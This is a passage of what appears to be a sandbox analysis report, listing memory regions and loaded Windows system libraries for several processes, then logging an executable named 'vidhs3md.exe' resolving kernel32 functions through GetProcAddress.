mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 8493 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 8494 start_va = 0xfb07b00000 end_va = 0xfb07c87fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fb07b00000" filename = "" Region: id = 8495 start_va = 0xfb07c90000 end_va = 0xfb07e10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fb07c90000" filename = "" Region: id = 8496 start_va = 0xfb07e20000 end_va = 0xfb0921ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fb07e20000" filename = "" Region: id = 8497 start_va = 0xfb079d0000 end_va = 0xfb079d0fff entry_point = 0x0 region_type = private name = "private_0x000000fb079d0000" filename = "" Region: id = 8498 start_va = 0xfb079e0000 end_va = 0xfb079e0fff entry_point = 0x0 region_type = private name = "private_0x000000fb079e0000" filename = "" Region: id = 8499 start_va = 0xfb09220000 end_va = 0xfb093bffff entry_point = 0x0 region_type = private name = "private_0x000000fb09220000" filename = "" Region: id = 8500 start_va = 0xfb079f0000 end_va = 0xfb07a2ffff entry_point = 0x0 region_type = private name = "private_0x000000fb079f0000" filename = "" Region: id = 8501 start_va = 0x7ff7fcc8a000 end_va = 0x7ff7fcc8bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fcc8a000" filename = "" Region: id = 8502 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 8503 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 8504 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8505 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 8506 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 8507 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 8508 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 8509 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 8534 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 8535 start_va = 0xfb07a30000 end_va = 0xfb07adffff entry_point = 0x0 region_type = private name = "private_0x000000fb07a30000" filename = "" Region: id = 8544 start_va = 0xfb093c0000 end_va = 0xfb096f6fff entry_point = 0xfb093c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8545 start_va = 0xfb07770000 end_va = 0xfb07790fff entry_point = 0xfb07770000 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 8546 start_va = 0xfb07a30000 end_va = 0xfb07a88fff entry_point = 0xfb07a30000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 8547 start_va = 0xfb07ad0000 end_va = 0xfb07adffff entry_point = 0x0 region_type = private name = "private_0x000000fb07ad0000" filename = "" Region: id = 8548 start_va = 0xfb09700000 end_va = 0xfb09912fff entry_point = 0x0 region_type = private name = "private_0x000000fb09700000" filename = "" Region: id = 8549 start_va = 0xfb09920000 end_va = 0xfb09b39fff entry_point = 0x0 region_type = private name = "private_0x000000fb09920000" filename = "" Region: id = 8550 start_va = 0xfb09220000 end_va = 0xfb09328fff entry_point = 0x0 region_type = private name = "private_0x000000fb09220000" filename = "" Region: id = 8551 start_va = 0xfb093b0000 end_va = 0xfb093bffff entry_point = 0x0 region_type = private name = "private_0x000000fb093b0000" filename = "" Region: id = 8552 start_va = 0xfb09b40000 end_va = 0xfb09d55fff entry_point = 0x0 region_type = private name = "private_0x000000fb09b40000" filename = "" Region: id = 8553 start_va = 0xfb09d60000 end_va = 0xfb09e6dfff entry_point = 0x0 region_type = private name = "private_0x000000fb09d60000" filename = "" Region: id = 8554 start_va = 0xfb07770000 end_va = 0xfb077affff entry_point = 0x0 region_type = private name = "private_0x000000fb07770000" filename = "" Region: id = 8555 start_va = 0xfb07a30000 end_va = 0xfb07a30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fb07a30000" filename = "" Region: id = 8556 start_va = 0x7ff7fcc8e000 end_va = 0x7ff7fcc8ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fcc8e000" filename = "" Region: id = 8557 start_va = 0xfb09e70000 end_va = 0xfb09f27fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fb09e70000" filename = "" Region: id = 8558 start_va = 0xfb07a30000 end_va = 0xfb07a33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fb07a30000" filename = "" Region: id = 8559 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 8560 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 8561 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 8562 start_va = 0xfb07a40000 end_va = 0xfb07a46fff entry_point = 0x0 region_type = private name = "private_0x000000fb07a40000" filename = "" Region: id = 8563 start_va = 0xfb07a50000 end_va = 0xfb07a54fff entry_point = 0xfb07a50000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 8564 start_va = 0xfb07a60000 end_va = 0xfb07a60fff entry_point = 0xfb07a60000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 8565 start_va = 0xfb07a70000 end_va = 0xfb07a71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fb07a70000" filename = "" Region: id = 8566 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 8567 start_va = 0xfb07a80000 end_va = 0xfb07a80fff entry_point = 0xfb07a80000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 8568 start_va = 0xfb07a90000 end_va = 0xfb07a91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fb07a90000" filename = "" Region: id = 8569 start_va = 0xfb07a80000 end_va = 0xfb07a80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fb07a80000" filename = "" Thread: id = 930 os_tid = 0x274 Thread: id = 931 os_tid = 0xf40 Thread: id = 932 os_tid = 0x9f8 Thread: id = 936 os_tid = 0x968 Process: id = "120" image_name = "vidhs3md.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe" page_root = "0x788ab000" os_pid = "0x904" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "117" os_parent_pid = "0xedc" cmd_line = "vIDhS3md.exe -accepteula \"WinMail.exe.mui\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8580 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8581 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8582 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8583 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 8584 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 8585 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 8586 start_va = 0x400000 end_va = 0x476fff entry_point = 0x400000 region_type = mapped_file name = "vidhs3md.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe") Region: id = 8587 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8588 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8589 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 8590 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 8591 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8592 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8593 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8594 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8595 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 8596 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8597 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 8598 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 8599 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8600 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8601 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8602 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8603 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 8605 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8606 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8607 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8608 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 8692 start_va = 0x320000 end_va = 0x3ddfff entry_point = 0x320000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8693 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 8694 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 8695 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8696 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 8697 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 8698 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8699 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 8700 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8701 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8702 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8703 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8704 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 8705 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 8706 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 8707 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 8708 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 8709 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 8710 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 8711 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 8712 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 8713 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 8714 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 8715 start_va = 0x743b0000 end_va = 0x74441fff entry_point = 0x743b0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 8716 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 8717 start_va = 0x580000 end_va = 0x6fffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 8728 start_va = 0x580000 end_va = 0x5a9fff entry_point = 0x580000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8729 start_va = 0x6f0000 end_va = 0x6fffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 8730 start_va = 0x700000 end_va = 0x887fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 8731 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8732 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 8733 start_va = 0x890000 end_va = 0xa10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 8734 start_va = 0xa20000 end_va = 0x1e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 8735 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8736 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 8737 start_va = 0x580000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Thread: id = 938 os_tid = 0xe98 [0286.351] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75130000 [0286.351] GetProcAddress (hModule=0x75130000, lpProcName="SetEvent") returned 0x751560c0 [0286.351] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75156110 [0286.351] GetProcAddress (hModule=0x75130000, lpProcName="DeviceIoControl") returned 0x751487e0 [0286.351] GetProcAddress (hModule=0x75130000, lpProcName="DuplicateHandle") returned 0x75155f30 [0286.351] GetProcAddress (hModule=0x75130000, lpProcName="FormatMessageW") returned 0x75154a40 [0286.351] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventW") returned 0x75155fa0 [0286.351] GetProcAddress (hModule=0x75130000, lpProcName="CreateProcessW") returned 0x7514a510 [0286.351] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsW") returned 0x7514c8c0 [0286.351] GetProcAddress (hModule=0x75130000, lpProcName="GetDriveTypeW") returned 0x75156300 [0286.352] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDirectoryW") returned 0x75149a90 [0286.352] GetProcAddress (hModule=0x75130000, lpProcName="DeleteFileW") returned 0x751561b0 [0286.352] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadErrorMode") returned 0x7514fae0 [0286.352] GetProcAddress (hModule=0x75130000, lpProcName="HeapSize") returned 0x779e4f40 [0286.352] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringW") returned 0x75149a40 [0286.352] GetProcAddress (hModule=0x75130000, lpProcName="GetStringTypeW") returned 0x751479b0 [0286.352] GetProcAddress (hModule=0x75130000, lpProcName="TerminateThread") returned 0x7514fcb0 [0286.352] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x751492b0 [0286.352] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514a300 [0286.352] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileW") returned 0x75156180 [0286.352] GetProcAddress (hModule=0x75130000, lpProcName="FindResourceW") returned 0x75153a50 [0286.353] GetProcAddress (hModule=0x75130000, lpProcName="SizeofResource") returned 0x75148cb0 [0286.353] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x75155f20 [0286.353] GetProcAddress (hModule=0x75130000, lpProcName="SetLastError") returned 0x75142af0 [0286.353] GetProcAddress (hModule=0x75130000, lpProcName="LoadResource") returned 0x751478f0 [0286.353] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x75142db0 [0286.353] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcess") returned 0x75142da0 [0286.353] GetProcAddress (hModule=0x75130000, lpProcName="LockResource") returned 0x75147a50 [0286.353] GetProcAddress (hModule=0x75130000, lpProcName="GetCommandLineW") returned 0x7514a4b0 [0286.353] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleW") returned 0x75149660 [0286.353] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryW") returned 0x7514a0b0 [0286.353] GetProcAddress (hModule=0x75130000, lpProcName="GetStdHandle") returned 0x7514a060 [0286.354] GetProcAddress (hModule=0x75130000, lpProcName="LocalFree") returned 0x751487c0 [0286.354] GetProcAddress (hModule=0x75130000, lpProcName="LocalAlloc") returned 0x75148840 [0286.354] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75147940 [0286.354] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleFileNameW") returned 0x75149560 [0286.354] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleScreenBufferInfo") returned 0x751569c0 [0286.354] GetProcAddress (hModule=0x75130000, lpProcName="GetFileType") returned 0x75156390 [0286.379] GetProcAddress (hModule=0x75130000, lpProcName="OutputDebugStringW") returned 0x75171c30 [0286.401] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleW") returned 0x751568e0 [0286.401] GetProcAddress (hModule=0x75130000, lpProcName="WriteConsoleW") returned 0x75156920 [0286.401] GetProcAddress (hModule=0x75130000, lpProcName="SetFilePointerEx") returned 0x75156540 [0286.401] GetProcAddress (hModule=0x75130000, lpProcName="EnterCriticalSection") returned 0x779d5e80 [0286.401] GetProcAddress (hModule=0x75130000, lpProcName="LeaveCriticalSection") returned 0x779d5e00 [0286.401] GetProcAddress (hModule=0x75130000, lpProcName="SetStdHandle") returned 0x751726a0 [0286.402] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x779cda90 [0286.402] GetProcAddress (hModule=0x75130000, lpProcName="EncodePointer") returned 0x779ef190 [0286.402] GetProcAddress (hModule=0x75130000, lpProcName="DecodePointer") returned 0x779ea200 [0286.403] GetProcAddress (hModule=0x75130000, lpProcName="ExitProcess") returned 0x751574f0 [0286.403] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleExW") returned 0x75149fa0 [0286.403] GetProcAddress (hModule=0x75130000, lpProcName="MultiByteToWideChar") returned 0x75142d60 [0286.403] GetProcAddress (hModule=0x75130000, lpProcName="WideCharToMultiByte") returned 0x751475a0 [0286.403] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751425e0 [0286.403] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleMode") returned 0x75156870 [0286.403] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleInputA") returned 0x751568c0 [0286.403] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleMode") returned 0x75156900 [0286.403] GetProcAddress (hModule=0x75130000, lpProcName="CreateThread") returned 0x75149700 [0286.403] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentThreadId") returned 0x75141b90 [0286.403] GetProcAddress (hModule=0x75130000, lpProcName="ExitThread") returned 0x779f2570 [0286.403] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryExW") returned 0x75147920 [0286.403] GetProcAddress (hModule=0x75130000, lpProcName="DeleteCriticalSection") returned 0x779e9920 [0286.403] GetProcAddress (hModule=0x75130000, lpProcName="FlushFileBuffers") returned 0x751562a0 [0286.403] GetProcAddress (hModule=0x75130000, lpProcName="WriteFile") returned 0x75156590 [0286.403] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleCP") returned 0x75156860 [0286.404] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0286.404] GetProcAddress (hModule=0x75130000, lpProcName="IsProcessorFeaturePresent") returned 0x75149680 [0286.404] GetProcAddress (hModule=0x75130000, lpProcName="ReadFile") returned 0x751564a0 [0286.404] GetProcAddress (hModule=0x75130000, lpProcName="GetStartupInfoW") returned 0x7514a080 [0286.404] GetProcAddress (hModule=0x75130000, lpProcName="UnhandledExceptionFilter") returned 0x751728e0 [0286.404] GetProcAddress (hModule=0x75130000, lpProcName="SetUnhandledExceptionFilter") returned 0x7514a2c0 